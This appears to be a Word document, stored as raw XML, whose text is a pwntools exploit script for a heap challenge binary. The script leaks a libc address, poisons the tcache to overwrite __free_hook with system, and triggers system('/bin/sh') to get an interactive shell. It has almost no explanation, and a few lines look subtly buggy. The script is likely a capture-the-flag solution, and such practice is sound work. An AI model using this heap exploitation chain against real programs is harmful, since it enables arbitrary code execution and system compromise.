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D9687" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10649E46" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="7F18A61D" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>context.arch = 'amd64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA999B3" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>p = process('./heap')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A48E9" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>elf = ELF('./heap')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BE73D" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>libc = ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2EBC6" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="6A4BD1E2" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>def add(idx, size, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFCBD3" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'&gt;', b'1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB601A" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'Index: ', str(idx).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA2A86D" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'Size: ', str(size).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E243569" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendafter(b'Content: ', content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21F8DA" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="685498C3" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>def delete(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10755B51" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'&gt;', '2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CEA2D" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'Index: ', str(idx).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F07939" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="5C672E03" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>def edit(idx, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D182B" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'&gt;', '3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77752181" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'Index: ', str(idx).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639343AD" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendafter(b'New Content: ', content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239840C1" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="22F8FE16" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>def show(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453860E4" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'&gt;', '4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9EEEF" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    p.sendlineafter(b'Index: ', str(idx).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F801414" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>    return p.recvline()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F0128" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="6C2C36B7" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t># Step 1: Leak libc address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C0CDA" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(0, 0x500, b'A'*8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6097F" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(1, 0x20, b'B'*8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967222F" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>delete(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74971EC4" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>libc_leak = u64(show(0).split(b'Content: ').ljust(8, b'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64844029" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>print(hex(libc_leak))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E4195" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>libc_base = libc_leak - 0x1ecbe0  # Offset for libc 2.31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246BF0F" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>free_hook = libc_base + libc.sym['__free_hook']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C5254" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>system = libc_base + libc.sym['system']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F3CFA" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="5E232234" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t># Step 2: Tcache poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E40780" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(2, 0x80, b'C'*8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B006E7A" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(3, 0x80, b'D'*8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B01E9" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>delete(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4F4FA" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>delete(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56F08A" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>edit(3, p64(free_hook))  # Overwrite fd pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856B02F" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="00B1AA95" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:lastRenderedPageBreak/>
        <w:t># Step 3: Hijack __free_hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE9CFC0" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(4, 0x80, b'/bin/sh\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3C661" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>add(5, 0x80, p64(system))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E3D12" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>delete(4)  # Trigger system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129C078" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="59C988D8" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B">
      <w:r w:rsidRPr="00D22A1B">
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393AABA" w14:textId="77777777" w:rsidR="00D22A1B" w:rsidRPr="00D22A1B" w:rsidRDefault="00D22A1B" w:rsidP="00D22A1B"/>
    <w:p w14:paraId="0C97181C" w14:textId="77777777" w:rsidR="000C412A" w:rsidRDefault="000C412A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000C4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77"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="00280F85"/>
    <w:rsid w:val="00556521"/>
    <w:rsid w:val="005D4495"/>
    <w:rsid w:val="00844A77"/>
    <w:rsid w:val="008A5C04"/>
    <w:rsid w:val="008A6BB9"/>
    <w:rsid w:val="00CA1913"/>
    <w:rsid w:val="00D22A1B"/>
    <w:rsid w:val="00EA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024EA-EB32-4641-AB6C-B72785CC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4A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A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4A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4A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4A7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4A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4A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4A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A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4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4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4A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4A7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4A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4A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4A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4A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4A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4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4A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4A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4A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4A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4A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4A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4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4A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4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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T04:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-23T04:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>